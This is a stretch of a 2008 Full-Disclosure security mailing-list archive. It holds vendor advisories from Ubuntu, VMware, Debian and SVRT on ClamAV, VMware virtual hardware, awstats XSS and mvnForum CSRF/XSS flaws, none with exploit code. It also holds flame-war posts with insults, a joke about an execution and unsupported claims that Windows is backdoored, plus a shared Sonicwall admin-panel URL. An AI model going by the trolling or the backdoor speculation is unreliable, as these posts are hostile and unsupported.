http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.94.dfsg.2-1ubuntu0.1_all.deb Size/MD5: 208058 8dd86c35b97cfa0c111ec6a99f90d7b4 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 239628 465bacd5ebfec386196f83b90c59b1d5 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 914866 309f142bd797da5b06bae9f3273c729a http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 255448 b28942a9a6ecd5b09eea78f22f56658c http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 235612 d7fc1fbc5112f2b8b4bb81f26f8495bd http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 573860 1a499485cdee3a5ed728fdb115d4708e http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 538626 f1ec69b8d9bc15cf1b6ab9b483b37568 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_amd64.deb Size/MD5: 232722 4abb421ae13f2c04ccf7e975d68344f1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 233172 1e14e971a76712c4a38d3250e3f84a4f http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 849368 dc7e8747a2f1b40db10fd3dfa80d6d8f http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 253682 2dfbb18dbe45b97fe537e440c86079f0 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 232686 f5fc69f35bb5206e6f3f1802eab27b87 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 541856 cc9e3b0f262968372c5cdf8b62606280 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 524410 2d1f9e712a3ef57c99434469a584f38d http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_i386.deb Size/MD5: 229260 280079fa42c8ff6a18a8fd1406956f3c lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 232694 509ca94dd8ba239e70df349015eab8b6 http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 866262 636afb92077246666719c22544dda5bd http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 253738 0581fb06ce78fd9a2d1e2d81cfa95e87 http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 232232 7e301b68901a3435da4768b2845bf61d http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 543754 bd8453f227ae9bebcec4fb41b9e9d427 http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 527060 b903aa2ec89a2b3c327e170f3b23e021 http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_lpia.deb Size/MD5: 229286 d2af0a51fa4beb6eb3045f2dfa3abe9e powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 242896 a8a6f8ef5d43b0856cb250879b6d741d http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 903632 275eb13f4b9caa6ab4089aa0d8e97b24 http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 258198 2109d15b9bcb4cedeb380ac295c26364 http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 240246 c373dfb0ec6bd9539575aad28310a5ae http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 613886 8a59e0abf3597d1c13ffa47ee0700b48 http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 554872 992aa23fb6ed82684c8325743e366947 http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_powerpc.deb Size/MD5: 232832 36d93e39e3f1f74dde643bc78e38c4a7 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 232694 22f99a7b96cf3ab8749316cb3256b168 http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 836388 a2eb3d95d9a6254db4d7375844f18f57 http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 252954 b21baca5066e5e27a8b8154cc17b9d2c http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 233100 3c0b967b8a11e701698a1099a171ee82 http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 577734 05eb85bfb1a2ac3b223eba160167c7e2 http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 543454 09533df800dafec77af220c81897cb0e http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_sparc.deb Size/MD5: 230206 5abbd9810492e866183bb1033a284b18 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/d6ae81ab/attachment.bin From security at vmware.com Wed Dec 3 05:24:01 2008 From: security at vmware.com (VMware Security team) Date: Tue, 02 Dec 2008 21:24:01 -0800 Subject: [Full-disclosure] VMSA-2008-0019 VMware Hosted products and patches for ESX and ESXi resolve a critical security issue and update bzip2 Message-ID: <493617F1.5070403@vmware.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- VMware Security Advisory Advisory ID: VMSA-2008-0019 Synopsis: VMware Hosted products and patches for ESX and ESXi resolve a critical security issue and update bzip2 Issue date: 2008-12-02 Updated on: 2008-12-02 (initial release of advisory) CVE numbers: CVE-2008-4917 CVE-2008-1372 - ------------------------------------------------------------------------- 1. Summary Updated VMware Hosted products and patches for ESX and ESXi resolve two security issues. The first is a critical memory corruption vulnerability in virtual device hardware. The second is an updated bzip2 package for the Service Console. 2. Relevant releases VMware Workstation 6.0.5 and earlier, VMware Workstation 5.5.8 and earlier, VMware Player 2.0.5 and earlier, VMware Player 1.0.8 and earlier, VMware Server 1.0.9 and earlier, VMware ESXi 3.5 without patch ESXe350-200811401-O-SG VMware ESX 3.5 without patches ESX350-200811406-SG and ESX350-200811401-SG VMware ESX 3.0.3 without patches ESX303-200811404-SG and ESX303-200811401-BG VMware ESX 3.0.2 without patches ESX-1006980 and ESX-1006982 NOTE: Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08. Users should plan to upgrade to ESX 3.0.3 and preferably to the newest release available. 3. Problem Description a. Critical Memory corruption vulnerability A memory corruption condition may occur in the virtual machine hardware. A malicious request sent from the guest operating system to the virtual hardware may cause the virtual hardware to write to uncontrolled physical memory. VMware would like to thank Andrew Honig of the Department of Defense for reporting this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-4917 to this issue. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected Workstation 6.5.x any not affected Workstation 6.0.x any 6.5.0 build 118166 or later Workstation 5.x any 5.5.9 build 126128 or later Player 2.5.x any not affected Player 2.0.x any 2.5.0 build 118166 or later Player 1.x any 1.0.9 build 126128 or later ACE 2.5.x Windows not affected ACE 2.0.x Windows 2.5.0 build 118166 or later ACE 1.x Windows 1.0.8 build 125922 or later Server 2.x any not affected Server 1.x any 1.0.8 build 126538 or later Fusion 2.x Mac OS/X not affected Fusion 1.x Mac OS/X upgrade to Fusion 2.0 or later ESXi 3.5 ESXi ESXe350-200811401-O-SG ESX 3.5 ESX ESX350-200811401-SG ESX 3.0.3 ESX ESX303-200811401-BG ESX 3.0.2 ESX ESX-1006980 ESX 2.5.5 ESX not affected b. Updated Service Console package bzip2 bzip2 versions before 1.0.5 can crash if certain flaws in compressed data lead to reading beyond the end of a buffer. This might cause an application linked to the libbz2 library to crash when decompressing malformed archives. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-1372 to this issue. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected hosted * any any not affected ESXi 3.5 ESXi not affected ESX 3.5 ESX ESX350-200811406-SG ESX 3.0.3 ESX ESX303-200811404-SG ESX 3.0.2 ESX ESX-1006982 ESX 2.5.5 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file. VMware Workstation 5.5.9 ------------------------ http://www.vmware.com/download/ws/ws5.html Release notes: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html Windows binary: md5sum: 509c7b323a8ac42c0a92b0a1446bb0f8 Compressed Tar archive for 32-bit Linux md5sum: 9d189e72f8111e44b27f1ee92edf265e Linux RPM version for 32-bit Linux md5sum: 0957c5258d033d0107517df64bfea240 VMware Player 1.0.9 ----------------------------- http://www.vmware.com/download/player/ Release notes Player 1.x: http://www.vmware.com/support/player/doc/releasenotes_player.html Windows binary md5sum: e2c8dd7b27df7d348f14f69de017b93f Player 1.0.9 for Linux (.rpm) md5sum: 471c3881fa60b058b1dac1d3c9c32c85 Player 1.0.9 for Linux (.tar) md5sum: bef507811698e7333f5e8cb672530dbf VMware Server 1.0.8 ------------------- http://www.vmware.com/download/server/ Release notes: http://www.vmware.com/support/server/doc/releasenotes_server.html VMware Server for Windows 32-bit and 64-bit md5sum: 4ba41e5fa192f786121a7395ebaa8d7c VMware Server Windows client package md5sum: f25746e275ca00f28d44ad372fc92536 VMware Server for Linux md5sum: a476d3953ab1ff8457735e692fa5edf9 VMware Server for Linux rpm md5sum: af6890506618fa82928fbfba8a5f97e1 Management Interface md5sum: 5982b84a39479cabce63e12ab664d369 VMware Server Linux client package md5sum: 605d7db48f63211cc3f5ddb2b3f915a6 ESXi ---- ESXi 3.5 patch ESXe350-200811401-O-SG http://download3.vmware.com/software/vi/ESXe350-200811401-O-SG.zip md5sum: e895c8cb0d32b722d7820d0214416092 http://kb.vmware.com/kb/1007507 NOTE: The three ESXi patches for Firmware "I", VMware Tools "T," and the VI Client "C" are contained in a single offline "O" download file. ESX --- ESX 3.5 patch ESX350-200811401-SG (memory corruption) http://download3.vmware.com/software/vi/ESX350-200811401-SG.zip md5sum: 988042ce20ce2381216fbe1862c3e66d http://kb.vmware.com/kb/1007501 ESX 3.5 patch ESX350-200811406-SG (bzip2) http://download3.vmware.com/software/vi/ESX350-200811406-SG.zip md5sum: 285ec405ac34a196cbb796922e22cca2 http://kb.vmware.com/kb/1007504 ESX 3.0.3 patch ESX303-200811401-BG (memory corruption) http://download3.vmware.com/software/vi/ESX303-200811401-BG.zip md5sum: 26bf687a3483951d1f14ab66edf1d196 http://kb.vmware.com/kb/1006986 ESX 3.0.3 patch ESX303-200811404-SG (bzip2) http://download3.vmware.com/software/vi/ESX303-200811404-SG.zip md5sum: 2707e4a599867b0444e85a75a471ed4f http://kb.vmware.com/kb/1007198 ESX 3.0.2 patch ESX-1006980 (memory corruption) http://download3.vmware.com/software/vi/ESX-1006980.tgz md5sum: 5e73f1585fea3ee770b2df2b94e73ca4 http://kb.vmware.com/kb/1006980 ESX 3.0.2 patch ESX-1006982 (bzip2) http://download3.vmware.com/software/vi/ESX-1006982.tgz md5sum: 4921cf542b5979bd0eef7f2c15683b71 http://kb.vmware.com/kb/1006982 5. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4917 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372 - ------------------------------------------------------------------------- 6. Change log 2008-12-02 VMSA-2008-0019 Initial security advisory after release of patches for ESXi, ESX 3.5, ESX 3.0.3, ESX 3.0.2. Updated hosted products were previously released on 2008-11-06. - ------------------------------------------------------------------------ 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2008 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) iD8DBQFJNhfuS2KysvBH1xkRAt0NAJ0ap7HIEzEsxWxxeJbni4I5SaBeLACfdKSt A0VgCubYwg7psnfOUEHM9+o= =mieL -----END PGP SIGNATURE----- From my.security.lists at gmail.com Wed Dec 3 07:17:29 2008 From: my.security.lists at gmail.com (Rob Thompson) Date: Tue, 02 Dec 2008 23:17:29 -0800 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected In-Reply-To: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com> References: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com> Message-ID: <49363289.2020508@gmail.com> IT Security wrote: > DRM schemes like this only cause problems for the LEGITIMATE customers . And to think that you paid a very good amount of money for that level of service. We all know that there is no level of DRM that can protect anything. Where there is a will, there is a way. Your statement of affecting only legitimate customers is dead on the money. Time to start voting with dollars and holding companies accountable. This state of eating whatever they spoon feed to us needs to end. We all allowed this to happen. > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Rob +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | _ | | ASCII ribbon campaign ( ) | | - against HTML email X | | / \ | | | +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ From xploitable at gmail.com Wed Dec 3 08:34:56 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 08:34:56 +0000 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> Message-ID: <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> You're like a shite that won't flush away. On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote: > all speculation: > > no 1 knows 4 sure. > > http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss > > http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ > > http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm > > c how i did that n3td3v? i posted links, nd talked about the article > w/out stealing ppls work. > > pay attention. > > > On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight wrote: >> 2008/12/2 Ureleet >>> >>> u arent getting it. >>> >>> it has nothing 2 do w/ backdoors. they r talking about actual >>> backdoors in the code. so that anyone who knows the backdoor can >>> acess any windows system regarless. they r saying that microsoft has >>> coded backdoors into the system so that the govt can get into any >>> system, patched or not. pay attention. >> >> I haven't seen anything that suggests that systems are/will be backdoored >> here. The text of the statement said "remote searches" which in legal terms >> could be anything from something as simple as browsing shared files >> available through P2P to full remote system access. >> >> Do you have anything else that suggests Windows has backdoors present other >> than this statement? >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From xploitable at gmail.com Wed Dec 3 08:43:20 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 08:43:20 +0000 Subject: [Full-disclosure] News for Ureleet Message-ID: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> I don't write news articles and I copy and paste abstracts from them, welcome to fair use. If I wanted to be a news journalist I wouldn't be a security researcher and ethical hacker. http://en.wikipedia.org/wiki/Fair_use From xploitable at gmail.com Wed Dec 3 09:13:20 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 09:13:20 +0000 Subject: [Full-disclosure] Big database for email and mobile text messages expected to be scrapped by Queen Message-ID: <4b6ee9310812030113g5ee47f84nefdb43998d58ad5@mail.gmail.com> A communications data Bill, paving the way for a massive database of phone calls and emails, and a heritage protection Bill are also said to have been scrapped to make way for economic measures. http://news.sky.com/skynews/Home/Politics/The-Queens-Speech-Expected-To-Have-Economic-Measures-At-Its-Heart/Article/200812115171233?lpos=Politics_First_Home_Article_Teaser_Region_1&lid=ARTICLE_15171233_The_Queens_Speech_Expected_To_Have_Economic_Measures_At_Its_Heart From xploitable at gmail.com Wed Dec 3 09:30:23 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 09:30:23 +0000 Subject: [Full-disclosure] Big database for email and mobile text messages expected to be scrapped by Queen In-Reply-To: <4b6ee9310812030113g5ee47f84nefdb43998d58ad5@mail.gmail.com> References: <4b6ee9310812030113g5ee47f84nefdb43998d58ad5@mail.gmail.com> Message-ID: <4b6ee9310812030130j36c3afbhe340e305200f2e8c@mail.gmail.com> I hope they enjoy reading my emails, isn't that right Mi5, even though you've been reading them for years and this bill *idea* was just there to test public opinion to see if an age old intelligence service operation would be accepted by the British public. :) Fraid not old sunshine, though we know you're watching us anyway. All the best and stuff, n3td3v. On Wed, Dec 3, 2008 at 9:13 AM, n3td3v wrote: > A communications data Bill, paving the way for a massive database of > phone calls and emails, and a heritage protection Bill are also said > to have been scrapped to make way for economic measures. > > http://news.sky.com/skynews/Home/Politics/The-Queens-Speech-Expected-To-Have-Economic-Measures-At-Its-Heart/Article/200812115171233?lpos=Politics_First_Home_Article_Teaser_Region_1&lid=ARTICLE_15171233_The_Queens_Speech_Expected_To_Have_Economic_Measures_At_Its_Heart > From hijacka at googlemail.com Wed Dec 3 08:41:38 2008 From: hijacka at googlemail.com (pUm) Date: Wed, 3 Dec 2008 09:41:38 +0100 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected In-Reply-To: <49363289.2020508@gmail.com> References: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com> <49363289.2020508@gmail.com> Message-ID: <689000220812030041v1652ed84qff32aea6ab15a24a@mail.gmail.com> https://licensemanager.sonicwall.com/newui/admin/admin.jsp thats hilarious - it MUST be a kind of honeypot :P 2008/12/3 Rob Thompson : > IT Security wrote: >> DRM schemes like this only cause problems for the LEGITIMATE customers . > > And to think that you paid a very good amount of money for that level of > service. > > We all know that there is no level of DRM that can protect anything. > Where there is a will, there is a way. Your statement of affecting only > legitimate customers is dead on the money. > > Time to start voting with dollars and holding companies accountable. > This state of eating whatever they spoon feed to us needs to end. We > all allowed this to happen. > >> >> >> ------------------------------------------------------------------------ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > -- > Rob > > +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ > | _ | > | ASCII ribbon campaign ( ) | > | - against HTML email X | > | / \ | > | | > +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From xploitable at gmail.com Wed Dec 3 09:53:50 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 09:53:50 +0000 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com> References: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com> <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com> Message-ID: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> Did anyone think Gadi when they read this? On Mon, Dec 1, 2008 at 10:25 PM, n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Mon, Dec 1, 2008 at 10:23 PM > Subject: Iran executes IT expert who spied for Israel > To: n3td3v > > > "A COMPUTER expert has been executed in Iran after he confessed to > working for Mossad, the Israeli intelligence service. This provides a > rare insight into the intense espionage activity inside the Islamic > republic." > > http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece > From viktor.larionov at salva.ee Wed Dec 3 10:22:57 2008 From: viktor.larionov at salva.ee (Viktor Larionov) Date: Wed, 3 Dec 2008 12:22:57 +0200 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> Message-ID: My friend, I may disagree with Gadi on some points, but from my personal experience Gadi is a really nice aguy, and it's nice to chat with him. But let this be my personal oppinion, you shouldn't necessarily agree with me. This or that way, from my personal point of view, I would never wish anybody, even you, to end up in Iranian prison waiting for the execution. (and it's not code execution I'm talking about :) If you are still missing the point, you could just make a simple Google on the topic to see what is it all about, e.g. here: http://www.iran-e-sabz.org/news/torture.htm It's kind of nice and cousy to sit somewhere in the US or UK in your nice and cousy wheelchair making fun of someone's death...come to think about it - kind of makes me sick. And that's really kind of a bad subject to make fun of. I seriously doubt you can name yourself ethical (hacker or whatever you are) in the context of such statements. And I'm not even mentioning that we are talking cyber security around here - I guess going on personalities doesn't really match with the topic. For all other, sorry for the offtop. This netdev/ur3l33t stuff starts to get on my nerves too. Cheers! Viktor --- Viktor Larionov snr. system administrator R&D team Salva Kindlustuse AS Parnu mnt. 16 10141 Tallinn ESTONIA tel: (+372) 683 0636, (+372) 680 0500 fax: (+372) 680 0501 gsm: (+372) 5668 6811 viktor.larionov at salva.ee -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf Of n3td3v Sent: Wednesday, December 03, 2008 11:54 AM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Iran executes IT expert who spied for Israel Did anyone think Gadi when they read this? On Mon, Dec 1, 2008 at 10:25 PM, n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Mon, Dec 1, 2008 at 10:23 PM > Subject: Iran executes IT expert who spied for Israel > To: n3td3v > > > "A COMPUTER expert has been executed in Iran after he confessed to > working for Mossad, the Israeli intelligence service. This provides a > rare insight into the intense espionage activity inside the Islamic > republic." > > http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From fw at deneb.enyo.de Wed Dec 3 11:05:53 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Wed, 03 Dec 2008 12:05:53 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1679-1] New awstats packages fix cross-site scripting Message-ID: <877i6h7c32.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1679-1 security at debian.org http://www.debian.org/security/ Florian Weimer December 03, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : awstats Vulnerability : cross-site scripting Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-3714 Debian Bug : 495432 Morgan Todd discovered a cross-site scripting vulnerability in awstats, a log file analyzer, involving the "config" request parameter (and possibly others; CVE-2008-3714). For the stable distribution (etch), this problem has been fixed in version 6.5+dfsg-1+etch1. The unstable (sid) and testing (lenny) distribution will be fixed soon. We recommend that you upgrade your awstats package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg-1+etch1.diff.gz Size/MD5 checksum: 20369 bbe38406f0402fd5b7be2d0a427223c8 http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg-1+etch1.dsc Size/MD5 checksum: 1079 2fd97dfcfcbf48cbe0e4a1a431cb43bd http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg.orig.tar.gz Size/MD5 checksum: 1041837 af6cbfbf470eb45f5238501813d6d1c6 Architecture independent packages: http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg-1+etch1_all.deb Size/MD5 checksum: 837326 878a4f0ab2ccb36c324c0c171a6a39b5 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJNmdTAAoJEL97/wQC1SS+TcAIAIfJIHGr+9Rk31245IzedbFO 7STJngHclEAe4O88FKG98nn3nu0jme42HXaWF48hXqLe/IOMclTtorr1y91EXJeq 584oMZsN62OWVZClmpyc7qHBxytZkpFsUSQvmyA09LaCoQRI9x+dcdHN0OzKzFM0 M0KmaOR5uwVwCZMYbg4yxPi8PiACdPCOGquuZlz2cXVUI4DP18NEhK7T5wqol7KO 5WsAZqFTCq+TtVkJuVp9PVqr1XD+LnVfF3DIToAyWPT3gOUSP3Kh4/j50giV13JD Q/xTUooKm6L8Lo6wljtVYBdMIyiT2deiBp7z0nsotKG4p8Fw/0lTuJ4KkW/Ag2Q= =Cb7U -----END PGP SIGNATURE----- From xploitable at gmail.com Wed Dec 3 11:48:26 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 11:48:26 +0000 Subject: [Full-disclosure] Iran executes IT expert who spied for Israel In-Reply-To: References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> Message-ID: <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> Thank you for the self vaildation otherwise I wouldn't know you were an alias/troll. On Wed, Dec 3, 2008 at 10:22 AM, Viktor Larionov wrote: > Viktor Larionov > snr. system administrator > R&D team > Salva Kindlustuse AS > Parnu mnt. 16 > 10141 Tallinn > ESTONIA > tel: (+372) 683 0636, (+372) 680 0500 > fax: (+372) 680 0501 > gsm: (+372) 5668 6811 > viktor.larionov at salva.ee From svrt at bkav.com.vn Wed Dec 3 13:02:19 2008 From: svrt at bkav.com.vn (SVRT-Bkis) Date: Wed, 3 Dec 2008 20:02:19 +0700 Subject: [Full-disclosure] [SVRT-06-08] MULTI SECURITY VULNERABILITIES IN MVNFORUM Message-ID: MULTI SECURITY VULNERABILITIES IN MVNFORUM 1. General Information mvnForum is software used for creating forums on the Internet (http://www.mvnforum.com). This is an open source software making use of Java J2EE (ISP/Servlet) technology. On September 6 2008, SVRT-Bkis found several CSRF and XSS vulnerabilities in some functions of mvnForum 1.2 GA. These are highly serious vulnerabilities allowing hackers to perform privilege escalation attack on the Forum. We have contacted the development team and they have patched all those vulnerabilities in the latest version of mvnForum 1.2.1 GA. Details : http://security.bkis.vn/?p=286 SVRT Advisory : SVRT-06-08 Initial vendor notification : 30-10-2008 Release Date : 03-12-2008 Update Date : 03-12-2008 Discovered by : SVRT-Bkis Attack Type : CSRF, 